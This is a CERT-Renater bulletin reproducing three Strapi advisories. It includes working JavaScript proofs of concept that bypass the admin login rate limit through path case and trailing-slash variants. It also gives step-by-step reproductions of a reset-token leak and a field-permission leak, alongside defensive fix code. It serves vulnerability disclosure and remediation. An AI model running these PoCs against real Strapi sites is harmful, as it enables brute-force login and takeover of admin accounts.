
=====================================================================

                              CERT-Renater

                    Note d'Information No. 2023/VULN331

_____________________________________________________________________

DATE                : 20/09/2023

HARDWARE PLATFORM(S): /

OPERATING SYSTEM(S): Systems running strapi/plugin-users-permissions,
                     strapi/admin, strapi/plugin-content-manager
                     versions prior to 4.12.1;
                     strapi/admin, strapi/plugin-content-manager, strapi/utils
                     versions prior to 4.11.7.

=====================================================================
https://github.com/strapi/strapi/security/advisories/GHSA-24q2-59hm-rh9r
https://github.com/strapi/strapi/security/advisories/GHSA-v8gg-4mq2-88q4
https://github.com/strapi/strapi/security/advisories/GHSA-m284-85mf-cgrc
_____________________________________________________________________


Improper Rate Limiting
High
alexandrebodin published GHSA-24q2-59hm-rh9r Sep 13, 2023
Package
@strapi/admin (npm)

Affected versions
<= 4.12.0

Patched versions
>= 4.12.1

@strapi/plugin-users-permissions (npm)
<= 4.12.0
>= 4.12.1


Description

1. Summary

There is a rate limit on the login function of Strapi's admin screen,
but it is possible to circumvent it.

2. Details

It is possible to bypass it by modifying the rate-limited request path
as follows.

     Pattern 1: change the case of the request path (upper or lower case).
         Many variants are possible in this case.
     Pattern 2: add slashes to the end of the request path.

3. PoC

Access the administrator's login screen (/admin/auth/login) and execute
the following PoC on the browser's console screen.

Pattern 1 (uppercase and lowercase)

// poc.js
(async () => {
   const data1 = {
     email: "admin@strapi.com",   // registered e-mail address
     password: "invalid_password",
   };
   const data2 = {
     email: "admin@strapi.com",
     password: "RyG5z-CE2-]*4e4",   // correct password
   };

   for (let i = 0; i < 30; i++) {
     await fetch("http://localhost:1337/admin/login", {
       method: "POST",
       body: JSON.stringify(data1),
       headers: {
         "Content-Type": "application/json",
       },
     });
   }

   const res1 = await fetch("http://localhost:1337/admin/login", {
     method: "POST",
     body: JSON.stringify(data2),
     headers: {
       "Content-Type": "application/json",
     },
   });
   console.log(res1.status + " " + res1.statusText);

   const res2 = await fetch("http://localhost:1337/admin/Login", {  // capitalize part of path
     method: "POST",
     body: JSON.stringify(data2),
     headers: {
       "Content-Type": "application/json",
     },
   });
   console.log(res2.status + " " + res2.statusText);
})();

This PoC does the following:

     Sends 30 incorrect login requests.
     Sends the same request again and confirms from the console that it
     is blocked by the rate limit (429 Too Many Requests).
     Next, alters the pathname of the request (/admin/Login) and sends it
     again, confirming that the rate limit is bypassed and the login
     succeeds (200 OK).

Pattern 2 (trailing slash)

// poc.js
(async () => {
   const data1 = {
     email: "admin@strapi.com",   // registered e-mail address
     password: "invalid_password",
   };
   const data2 = {
     email: "admin@strapi.com",
     password: "RyG5z-CE2-]*4e4",   // correct password
   };

   for (let i = 0; i < 30; i++) {
     await fetch("http://localhost:1337/admin/login", {
       method: "POST",
       body: JSON.stringify(data1),
       headers: {
         "Content-Type": "application/json",
       },
     });
   }

   const res1 = await fetch("http://localhost:1337/admin/login", {
     method: "POST",
     body: JSON.stringify(data2),
     headers: {
       "Content-Type": "application/json",
     },
   });
   console.log(res1.status + " " + res1.statusText);

   const res2 = await fetch("http://localhost:1337/admin/login/", {  // trailing slash
     method: "POST",
     body: JSON.stringify(data2),
     headers: {
       "Content-Type": "application/json",
     },
   });
   console.log(res2.status + " " + res2.statusText);
})();

This PoC does the following:

     Sends 30 incorrect login requests.
     Sends the same request again and confirms from the console that it
     is blocked by the rate limit (429 Too Many Requests).
     Next, alters the pathname of the request (/admin/login/) and sends it
     again, confirming that the rate limit is bypassed and the login
     succeeds (200 OK).

PoC Video



4. Impact

It is possible to bypass the rate limit of the admin screen's login
function. This increases the likelihood of unauthorized login through a
brute-force attack on the login form.


5. Measures

Forcibly convert the request path used for rate limiting
(ctx.request.path) to upper or lower case so that differently cased
variants are treated as the same path.

Also, remove any extra slashes from the request path.

strapi/packages/core/admin/server/middlewares/rateLimit.js

Line 31 in 32d68f1
  prefixKey: `${userEmail}:${ctx.request.path}:${ctx.request.ip}`,
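
As an added example (not Strapi's own code), the following shows the
path normalization described above applied to a rate-limit key of the
same shape as the prefixKey, and replays the PoC's request sequence
against a small in-memory counter under both the original and the
normalized key; the e-mail, IP and attempt list are constructed.

```javascript
// Added example, not Strapi's own code: normalize the request path before
// it becomes part of the rate-limit key, so that case and trailing-slash
// variants of /admin/login all count against the same bucket.
function normalizePath(path) {
  let p = path.toLowerCase();                              // /admin/Login -> /admin/login
  p = p.replace(/\/{2,}/g, '/');                           // collapse repeated slashes
  if (p.length > 1 && p.endsWith('/')) p = p.slice(0, -1); // drop trailing slash
  return p;
}

// Same key shape as the prefixKey quoted above (email:path:ip), with the
// path normalized. The un-normalized shape is kept only for comparison.
const naiveKey = (email, path, ip) => `${email}:${path}:${ip}`;
const rateLimitKey = (email, path, ip) => `${email}:${normalizePath(path)}:${ip}`;

// Minimal in-memory fixed-window counter; a real deployment would use a
// shared store, but the keying is the part that matters here.
class LoginRateLimiter {
  constructor(max, windowMs) {
    this.max = max;
    this.windowMs = windowMs;
    this.hits = new Map();
  }
  // Returns true when the attempt is allowed, false when it should get 429.
  check(key, now = Date.now()) {
    const e = this.hits.get(key);
    if (!e || now - e.start >= this.windowMs) {
      this.hits.set(key, { start: now, count: 1 });
      return true;
    }
    e.count += 1;
    return e.count <= this.max;
  }
}

// Replay attempts (all within one window) and report allow/deny per request.
function simulate(paths, keyFn, max = 5) {
  const limiter = new LoginRateLimiter(max, 60000);
  return paths.map((p) => limiter.check(keyFn('admin@example.com', p, '127.0.0.1'), 0));
}

// Constructed sequence: five attempts on the canonical path, then the two
// variants used in the PoC above.
const attempts = [
  '/admin/login', '/admin/login', '/admin/login', '/admin/login', '/admin/login',
  '/admin/Login', '/admin/login/',
];
console.log('naive:', simulate(attempts, naiveKey));
console.log('fixed:', simulate(attempts, rateLimitKey));
```

With the naive key the last two requests start fresh buckets and are allowed; with the normalized key they are counted against the same bucket and denied.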

6. References

     OWASP: API2:2023 Broken Authentication
     OWASP: Authentication Cheat Sheet
     OWASP: Denial of Service Cheat Sheet (Rate limiting)


Severity
High

7.3 / 10

CVSS base metrics

Attack vector
Network

Attack complexity
Low

Privileges required
None

User interaction
None

Scope
Unchanged

Confidentiality
Low

Integrity
Low

Availability
Low

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVE ID
CVE-2023-38507

Weaknesses
CWE-307


Credits

     @scgajge12 scgajge12 Reporter
     @derrickmehaffy derrickmehaffy Remediation developer
     @innerdvations innerdvations Remediation reviewer
     @alexandrebodin alexandrebodin Remediation reviewer

_____________________________________________________________________


Leaking sensitive user information, user reset password, tokens
via content-manager views

Moderate
alexandrebodin published GHSA-v8gg-4mq2-88q4
Package
@strapi/admin (npm)

Affected versions
<= 4.11.6

Patched versions
>= 4.11.7

@strapi/plugin-content-manager (npm)
<= 4.11.6
>= 4.11.7

@strapi/utils (npm)
<= 4.11.6
>= 4.11.7


Description

Summary

I can get access to user reset password tokens if I have the
configure view permissions



Details

The /content-manager/relations route does not remove private fields
or ensure that they can't be selected.


PoC

Install a fresh Strapi instance.
Start up Strapi and create an account.
Create a new content type.
Give the content type a relation with admin users and save.
Go to Admin panel roles, Author, and then plugins.
Enable the configure view for content-manager collection types.
In the collection types, now only give them access to the collection you
created for this.
Create a new admin user account with the Author role.
Log out and request a password reset for the main admin user.
Log in on the newly created account.
Go to the collection type you created for this test and click the create
new entry button.
In the create new entry view, click on configure view.
Select the admin user relation we created and click on resetPasswordToken.
Now go back to the create an entry view; when selecting the relation we
created, we now see the reset token.


Impact

The impact is that the non-admin user now has the reset token of the
admin user's account and can reset its password using that to escalate
their privileges.

Still, you need the configure view permission to be able to escalate
your privileges.

Severity
Moderate

5.8 / 10

CVSS base metrics

Attack vector
Network

Attack complexity
High

Privileges required
Low

User interaction
Required

Scope
Changed

Confidentiality
High

Integrity
None

Availability
None

CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N

CVE ID
CVE-2023-36472

Weaknesses
No CWEs


Credits

     @Boegie19 Boegie19 Reporter
     @derrickmehaffy derrickmehaffy Remediation verifier
     @alexandrebodin alexandrebodin Remediation developer

_____________________________________________________________________


Field level permissions not being respected in relationship title
Low
alexandrebodin published GHSA-m284-85mf-cgrc
Package
@strapi/plugin-content-manager (npm)

Affected versions
<= 4.12.0

Patched versions
>= 4.12.1


Description

Summary

Field-level permissions are not being respected in the relationship
title. If I have a relationship title and the relationship shows a field
I don't have permission to see, it will still be visible.


Details

No RBAC checks on the relationship the relation endpoint returns.


PoC

Setup

Create a fresh Strapi instance.
Create a new content type.
In the newly created content type, add a relation to the
users-permissions user.
Save.
Create a users-permissions user.
Use your created content type and create an entry in it related to the
users-permissions user.
Go to Settings -> Admin panel -> Roles -> Author.
Give the Author role full permissions on the content type you created.
Make sure they don't have any permission to see User.
Save.
Create a new admin account with only the Author role.

Log in on the newly created Author account.
Go to the content manager, to the collection type you created with the
relationship to users_permissions_user.

You now see a field you don't have permission to view.


Impact

RBAC field-level checks leak data selected by the admin user as the
relationship title.

These could be sensitive fields that the person holding this specific
role should not be allowed to see.
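
The two advisories above (GHSA-v8gg-4mq2-88q4: private fields returned by
the relations route, and GHSA-m284-85mf-cgrc: no RBAC check on the field
shown as the relationship title) share one missing control. As an added
example that is not Strapi's code, the following sketches the
sanitization such a relations endpoint should apply before returning a
related entry; the schema, the role-permission table and the
'admin::user' uid string are constructed assumptions.

```javascript
// Added example, not Strapi's own code. It models the two checks the
// relations endpoint lacked: dropping attributes the schema marks
// `private: true` and applying the caller's field-level RBAC allowlist,
// including to the field shown as the relationship title.

// Constructed sample schema for an admin-user-like content type.
const adminUserSchema = {
  attributes: {
    email: { type: 'string' },
    firstname: { type: 'string' },
    password: { type: 'string', private: true },
    resetPasswordToken: { type: 'string', private: true },
  },
};

// Constructed sample permissions: fields a role may read per target uid
// (the uid string is an assumption). No entry means no read access at all.
const fieldPermissions = {
  author: { 'admin::user': ['email'] },
  viewer: {},
};

// Fields that are both non-private in the schema and granted to the role.
function readableFields(schema, role, uid) {
  const allowed = new Set((fieldPermissions[role] || {})[uid] || []);
  return Object.entries(schema.attributes)
    .filter(([name, attr]) => attr.private !== true && allowed.has(name))
    .map(([name]) => name);
}

// Sanitize one related entry: keep `id`, then only the requested fields
// (e.g. the one picked in configure view) that are readable by the caller.
function sanitizeRelation(schema, role, uid, entry, requested) {
  const ok = new Set(readableFields(schema, role, uid));
  const out = { id: entry.id };
  for (const f of requested) {
    if (ok.has(f) && f in entry) out[f] = entry[f];
  }
  return out;
}

// Title to display for the relation: the chosen main field only if it
// survived sanitization, otherwise fall back to the id.
function relationTitle(schema, role, uid, entry, mainField) {
  const s = sanitizeRelation(schema, role, uid, entry, [mainField]);
  return mainField in s ? String(s[mainField]) : String(s.id);
}
```

Selecting resetPasswordToken as the title therefore yields only the id, and a role with no read permission on the target sees the id regardless of the field chosen.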


Severity
Low

2.4 / 10

CVSS base metrics

Attack vector
Network

Attack complexity
Low

Privileges required
High

User interaction
Required

Scope
Unchanged

Confidentiality
Low

Integrity
None

Availability
None

CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:N/A:N

CVE ID
CVE-2023-37263

Weaknesses
No CWEs


Credits

     @Boegie19 Boegie19 Reporter
     @derrickmehaffy derrickmehaffy Remediation verifier
     @alexandrebodin alexandrebodin Remediation developer



=========================================================
+ CERT-RENATER        |    tel : 01-53-94-20-44         +
+ 23/25 Rue Daviel    |    fax : 01-53-94-20-41         +
+ 75013 Paris         |   email:cert@support.renater.fr +
=========================================================

